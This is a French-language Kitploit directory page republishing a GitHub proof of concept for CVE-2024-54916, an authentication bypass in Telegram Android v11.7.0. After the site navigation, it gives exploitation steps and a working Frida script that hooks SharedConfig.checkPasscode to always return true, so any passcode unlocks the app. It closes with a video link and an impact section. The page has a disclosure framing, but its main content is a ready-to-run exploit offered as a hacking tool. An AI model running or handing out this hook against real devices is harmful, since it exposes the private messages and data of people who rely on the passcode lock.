Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-54916 — Preuve de concept basée sur Frida démontrant le contournement d'authentification dans Telegram Android APK v11.7.0 en accrochant la méthode SharedConfig.checkPasscode pour qu'elle retourne toujours vrai. | Kitploit
Outils/GitHubGitHub/sahalll/cve-2024-54916
Sécurité AndroidAnalyse Dynamique (Sandboxing)Analyse des VulnérabilitésExploitationSécurité MobileAnalyse de BinairesAuthentification
GitHubsahalll/cve-2024-54916

CVE-2024-54916

Preuve de concept basée sur Frida démontrant le contournement d'authentification dans Telegram Android APK v11.7.0 en accrochant la méthode SharedConfig.checkPasscode pour qu'elle retourne toujours vrai.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-54916: Contournement d'authentification sur l'APK Telegram

Un problème dans la classe SharedConfig de l'APK Android Telegram v.11.7.0 permet à un attaquant physiquement proche de contourner l'authentification et d'élever ses privilèges en manipulant la valeur de retour de la méthode checkPasscode.

Type de vulnérabilité

Contournement d'authentification

Fournisseur du produit

Telegram

Code base du produit affecté

Telegram android apk v.11.7.0

Composant affecté

org.telegram.messenger.SharedConfig

Exploitation

Identifier la classe et la méthode cibles :

  • La classe SharedConfig dans l'application gère la logique de vérification du code d'accès.
  • La méthode checkPasscode au sein de cette classe est responsable de la détermination de la validité du code d'accès saisi.

Intercepter la méthode avec Frida

  • Un script Frida est utilisé pour intercepter la méthode checkPasscode dans la classe SharedConfig. L'implémentation de la méthode est modifiée pour toujours retourner true, contournant ainsi la validation réelle du code d'accès.

Exécution

  • Le script Frida est exécuté pendant que l'application est en cours d'exécution (dynamiquement). Tout code d'accès saisi par l'utilisateur sera accepté comme valide, permettant un accès non autorisé.

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

Lien vidéo POC :-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

Impact :-

Cette vulnérabilité est un problème de contournement d'authentification côté client. Elle affecte les utilisateurs qui comptent sur la fonctionnalité de code d'accès pour sécuriser des données sensibles ou restreindre l'accès à des fonctionnalités spécifiques de l'application. En exploitant cette faille, un attaquant physiquement proche peut manipuler le processus de vérification du code d'accès, contourner l'authentification et obtenir un accès non autorisé aux zones protégées de l'application. Cela pourrait entraîner l'exposition de données utilisateur sensibles ou des actions non autorisées au sein de l'application.

Télécharger l’outil